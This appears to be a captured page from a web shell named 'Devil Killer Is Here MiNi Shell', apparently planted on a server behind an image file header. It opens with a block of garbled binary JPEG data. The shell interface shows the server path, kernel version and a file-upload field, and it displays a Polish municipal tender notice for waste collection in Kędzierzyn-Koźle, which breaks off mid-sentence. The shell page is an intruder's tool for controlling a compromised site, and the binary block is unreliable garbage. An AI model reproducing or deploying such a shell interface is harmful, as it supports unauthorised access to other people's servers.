JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241211/0064711701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wywóz i zagospodarowanie odpadów komunalnych, odpadów z budowy, remontów i demontażu obiektów budowlanych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZARZĄD BUDYNKÓW KOMUNALNYCH W KĘDZIERZYNIE-KOŹLU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 530859315</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Grunwaldzka 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mzbk.kedzierzynkozle.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.mzbk.kedzierzynkozle.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wywóz i zagospodarowanie odpadów komunalnych, odpadów z budowy, remontów i demontażu obiektów budowlanych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0da7e9fc-567c-4f7d-a692-7dcfd499b1a6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00647117</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00185569/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Wywóz i zagospodarowanie odpadów komunalnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl/Ogloszenia/Details/a9227d7c-1e52-4966-a68f-395ec8927581 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem: https://e-propublico.pl/Ogloszenia/Details/a9227d7c-1e52-4966-a68f-395ec8927581.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem: https://e-propublico.pl/Ogloszenia/Details/a9227d7c-1e52-4966-a68f-395ec8927581.<br/>Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie.<br/>Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy:<br/>a)	stały dostęp do sieci Internet,<br/>b)	posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),<br/>c)	komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux,<br/>d)	zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera),<br/>Zamawiający dopuszcza następujący format przesyłanych danych:<br/>a)	pliki w formatach określonych w załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych <br/>i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, przy czym zaleca się wykorzystywanie plików w formacie .pdf, .doc, .docx, .xls, .xlsx.<br/>b)	w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip lub .7Z,<br/>c)	maksymalny rozmiar pojedynczego pliku to 120 MB, przy czym nie określa Zamawiający określa następujące informacje na temat kodowania i czasu odbioru danych:<br/>a)	załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie jest dostępny dla Zamawiającego i przechowywany jest na serwerach Platformy w formie zaszyfrowanej. Zamawiający otrzyma dostęp do pliku dopiero po upływie terminu otwarcia ofert;<br/>b)	oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w kolumnie „Data przesłania”;<br/>c)	o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.<br/>Ofertę, wraz ze stanowiącymi jej integralną część załącznikami, składa się pod rygorem nieważności w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub postaci elektronicznej podpisaną podpisem zaufanym lub podpisem osobistym, za pośrednictwem Platformy.<br/>Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. <br/>o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022, poz. 1233), które Wykonawca chce zastrzec w prowadzonym postępowaniu przy składaniu ofert, jako tajemnicę przedsiębiorstwa, powinny zostać przesłane za pośrednictwem Platformy, w osobnym podpisanym pliku, na karcie „Oferta/Załączniki”, w tabeli „Część oferty stanowiąca tajemnicę przedsiębiorstwa”, za pomocą opcji „Załącz plik”. Plik z tajemnicą przedsiębiorstwa nie może być łączony z innymi plikami w jednym archiwum (zip) podpisywanym elektronicznie. Niespełnienie tych zasad zachowania poufności będzie skutkować uznaniem takich informacji za jawne.<br/>Podpis elektroniczny zastosowany z poziomu programu MS OFFICE nie spełnia wymogu poprawnej weryfikacji.<br/>Nie zaleca się podpisywania folderu Archiwum (zip) zawierającego niepodpisane pliki – powinno nastąpić najpierw podpisanie plików, a potem ewentualnie spakowanie do zip.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, tym samy dane Wykonawców będą przetwarzane zgodnie z RODO i przepisami<br/>krajowymi. Szczegółowe określenie zasad zawarto w rozdziale 31 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, tym samy dane Wykonawców będą przetwarzane zgodnie z RODO i przepisami<br/>krajowymi. Szczegółowe określenie zasad zawarto w rozdziale 31 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZ/8/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I zamówienia: wywóz i zagospodarowanie odpadów komunalnych z terenu Targowisk Miejskich oraz Centrum Handlowego Manhattan w Kędzierzynie-Koźlu<br/><br/>Przedmiotem zamówienia jest wywóz i zagospodarowanie odpadów komunalnych z terenu targowisk przy ul. Damrota i Targowej oraz Centrum Handlowego Manhatan przy al. Jana Pawła II 27A w Kędzierzynie-Koźlu zgodnie z Ustawą z 14 grudnia 2012 r. o odpadach (Dz.U. 2023 poz. 1587 z późn. zm.). <br/><br/>Istotne informacje:<br/>TABELA PRZEWIDYWANEJ WIELKOŚCI ODBIORU ODPADÓW KOMUNALNYCH ZGROMADZONYCH W POJEMNIKACH <br/>1.	TARGOWISKO MIEJSKIE – Ul. Damrota	<br/>odpady niesegregowane 2 200L (2 x 1 100 L)	<br/>tworzywa sztuczne i metale 1 100L (1 x 1 100 L)	<br/>papier 1 100L (1 x 1 100 L)	<br/>szkło 120L (1 x 120L)	<br/>BIO 1 100L (1 x 1 100L)<br/>2.	TARGOWISKO MIEJSKIE –Ul. Targowa	<br/>odpady niesegregowane 2 200L (2 x 1 100 L)	<br/>tworzywa sztuczne i metale 1 100L (1 x 1 100 L)	<br/>papier 1 100L (1 x 1 100 L)	<br/>szkło 120L (1 x 120L)	<br/>BIO 1 100L (1 x 1 100L)<br/>3.	C.H. MANHATTAN – al. Jana Pawła II 27a	<br/>odpady niesegregowane 4 400L (4 x 1 100 L)	<br/>tworzywa sztuczne i metale 3 300L (3 x 1 100 L)	<br/>papier 6 600L (6 x 1 100 L)	<br/>szkło 120L (1 x 120L)	<br/>BIO 1 100L (1 x 1 100L)<br/><br/>TABELA CZĘSTOTLIWOŚCI ODBIORU ODPADÓW KOMUNALNYCH <br/>ZGROMADZONYCH W POJEMNIKACH <br/>1.	TARGOWISKO MIEJSKIE – ul. Damrota	<br/>odpady niesegregowane - 2 razy w miesiącu	<br/>tworzywa sztuczne i metale - 2 razy w miesiącu	<br/>papier - 2 razy w miesiącu	<br/>szkło - 1 raz na dwa miesiące	<br/>BIO - 4 razy w miesiącu<br/>2.	TARGOWISKO MIEJSKIE – ul. Targowa	<br/>odpady niesegregowane - 2 razy w miesiącu	<br/>tworzywa sztuczne i metale - 2 razy w miesiącu	<br/>papier - 2 razy w miesiącu	<br/>szkło - 1 raz na dwa miesiące	<br/>BIO - 4 razy w miesiącu<br/>3.	C.H. MANHATTAN – al. Jana Pawła II 27a	<br/>odpady niesegregowane - 4 razy w miesiącu	<br/>tworzywa sztuczne i metale - 4 razy w miesiącu	<br/>papier - 4 razy w miesiącu	<br/>szkło - 1 raz na dwa miesiące	<br/>BIO - 2 razy w miesiącu<br/><br/>1)	Przedmiot zamówienia obejmuje:<br/>a.	systematyczne opróżnianie, odbiór i wywóz nieczystości stałych, segregowanych odpadów komunalnych z miejsca ich składowania w celu ich utylizacji;<br/>b.	odbiór i wywóz specjalistycznym taborem;<br/>c.	opracowanie harmonogramu opróżniania, odbioru i wywozu nieczystości;<br/>d.	odstawienie opróżnianych pojemników na wskazane miejsce;<br/>e.	dezynfekowanie i mycie pojemników (jednorazowo w okresie letnim od lipca do września);<br/>f.	wymianę zużytych pojemników.<br/>3)	Odbiór odpadów gromadzonych selektywnie odbywać się będzie pojazdami przystosowanymi do odbierania poszczególnych frakcji odpadów w sposób wykluczający mieszanie odpadów.<br/>4)	Odpady komunalne będą gromadzone przez Zamawiającego we wskazanych pojemnikach, przy czym pojemniki dla wskazanych lokalizacji Wykonawca dostarczy nieodpłatnie, najpóźniej do 3 dni od zawarcia umowy. <br/>5)	Pojemniki, o których mowa wyżej muszą być wykonane z tworzywa sztucznego, spełniać normę PN-EN-840. Ponadto powinny posiadać opis i oznaczenie logo Wykonawcy.<br/>6)	Zamawiający wymaga niezwłocznego uprzątnięcia nieczystości luzem, powstających w wyniku niedokładnego opróżniania, załadunku czy opóźnionego wywozu.<br/>7)	W przypadku konieczności wykonania dodatkowego wywozu odpadów, podstawą rozliczeń między Zamawiającym a Wykonawcą będą ceny zawarte w obowiązującym cenniku usług świadczonych przez Wykonawcę. Wykonawca po wyborze jego oferty jako najkorzystniejszej zobowiązany jest dostarczyć obowiązujący cennik usług najpóźniej w dniu zawarcia umowy.<br/>8)	Wykonawca przez cały okres realizacji umowy zobowiązany jest do posiadania aktualnej decyzji dotyczącej gospodarowania odpadami, w zakresie zbierania/odzysku/unieszkodliwiania/ wstępnego przetwarzania odpadu będącego przedmiotem zamówienia zgodnie z Ustawą z 14 grudnia 2012 r. o odpadach (Dz.U. 2023 poz. 1587 z późn. zm.) oraz Ustawą z dnia 1 grudnia 2022r. Prawo ochrony środowiska (Dz. U. z 2024 r., poz. 54 z późn. zm.) .<br/>9)	Wykonawca przez cały okres realizacji umowy zobowiązany jest do posiadania wpisu do Bazy Danych o Produktach i Opakowaniach oraz Gospodarce Odpadami (BDO) obejmujące swoim zakresem transport odpadów będących przedmiotem zamówienia.<br/>10)	Wykonawca przez cały okres obowiązywania umowy ma obowiązek dysponowania 2 pojazdami typu śmieciarka przystosowanymi do odbierania zmieszanych odpadów komunalnych, spełniające normy emisji spalin co najmniej EURO 5.<br/>11)	Jeżeli Wykonawca stwierdzi, że użyte w SWZ i w załącznikach do SWZ normy krajowe lub normy europejskie lub normy międzynarodowe mogą wskazywać na producentów produktów lub źródła ich pochodzenia to Zamawiający dopuszcza w tym zakresie rozwiązania równoważne. Oznacza to, że parametry techniczne tak wskazanych produktów, określają wymagane przez Zamawiającego minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu umowy. Ponadto, <br/>w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, która może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych, przez które rozumie się takie, które posiadają parametry techniczne nie gorsze od tych wskazanych w SWZ i/lub w załącznikach do SWZ. Dopuszcza się również wykazanie tej równoważności normami równoważnymi w stosunku do tych wskazanych w OPZ. Na Wykonawcy spoczywa ciężar wskazania „równoważności”. Przy doborze materiałów równoważnych Wykonawca zobowiązany jest zapewnić również osiągnięcie wskaźników określonych w OPZ.<br/>12)	Pozostałe warunki realizacji przedmiotu zamówienia określa projekt umowy stanowiący załącznik do niniejszej SWZ (druk nr 6). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90500000-2 - Usługi związane z odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1)	Zamawiający przewiduje możliwość udzielenie zamówienia polegającego na powtórzeniu podobnych usług temu samemu Wykonawcy do wysokości 20% wartości zamówienia podstawowego, w okresie nie dłuższym niż 3 lata od udzielenia zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów: <br/>1.	Cena brutto całego zadania [PLN]	60%<br/>2.	Aspekt środowiskowy – Liczba pojazdów typu śmieciarka charakteryzujących się obniżoną emisją spalin stosownie do normy Euro 6 lub równoważnej [pojazd]	30%<br/>3.	Termin podjęcia działania związanego z realizacją dodatkowego odbioru odpadów komunalnych poza harmonogramem [czas]	10%<br/><br/>Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów: <br/>1.	Cena brutto (PLN) <br/>Liczba punktów = (Cmin/Cof) * 100 * waga <br/>gdzie: <br/>•	Cmin – najniższa cena spośród wszystkich ofert <br/>•	Cof - cena podana w badanej ofercie <br/>2.	Liczba pojazdów typu śmieciarka charakteryzujących się obniżoną emisją spalin stosownie do normy Euro 6 lub równoważnej [pojazd]<br/>gdzie: <br/>•	brak pojazdów typu śmieciarka w dyspozycji Wykonawcy spełniający ww. kryterium – 0 pkt <br/>•	1 pojazd typu śmieciarka w dyspozycji Wykonawcy spełniający ww. kryterium – 10 pkt <br/>•	2 pojazdy typu śmieciarka w dyspozycji Wykonawcy spełniający ww. kryterium – 20 pkt <br/>•	3 pojazdy typu śmieciarka w dyspozycji Wykonawcy spełniający ww. kryterium - 30 pkt<br/>3.	Termin podjęcia działania związanego z realizacją dodatkowego odbioru odpadów komunalnych poza harmonogramem [czas]<br/>Sposób przyznania punktów w kryterium: <br/>Zamawiający przyzna punkty w przedmiotowym kryterium w zależności od zaoferowanego przez Wykonawcę terminu realizacji dodatkowego odbioru odpadów komunalnych poza harmonogramem, <br/>w następujący sposób: <br/>•	24 godz. od otrzymania zgłoszenia – 0 pkt <br/>•	12 godz. od otrzymania zgłoszenia – 5 pkt<br/>•	6 godz. od otrzymania zgłoszenia – 10 pkt<br/>Termin 24 godz. realizacji dodatkowego odbioru jest terminem maksymalnym, zgodnie z warunkiem zamawiającego. Zaproponowanie czasu dłuższego niż 24 godz. będzie stanowić niezgodność z opisem przedmiotu zamówienia i podstawę do odrzucenia oferty.<br/><br/>Wykonawca może uzyskać w tym kryterium maksymalnie 10 pkt. W przypadku niewypełnienia bądź nieprawidłowego wypełnienia (np. nieczytelnego wypełnienia lub zaznaczenia więcej niż jednej kratki) odpowiedniej pozycji w Formularzu oferty, zamawiający uzna, że wykonawca oferuje maksymalny termin podjęcia działania związanego z realizacją dodatkowego odbioru odpadów komunalnych poza harmonogramem, określony w SWZ. Wykonawca otrzyma wówczas 0 punktów w kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt środowiskowy – Liczba pojazdów typu śmieciarka charakteryzujących się obniżoną emisją spalin stosownie do normy Euro 6 lub równoważnej [pojazd]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin podjęcia działania związanego z realizacją dodatkowego odbioru odpadów komunalnych poza harmonogramem [czas]</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II zamówienia: wywóz i zagospodarowanie odpadów budowlanych, poremontowych, w tym gruzu budowlanego<br/>Przedmiotem zamówienia jest wywóz i zagospodarowanie odpadów budowlanych, rozbiórkowych, w tym gruzu budowlanego, zmieszanych odpadów z budowy, remontów i demontażu (kody: 17.01 07, 17 01 02, 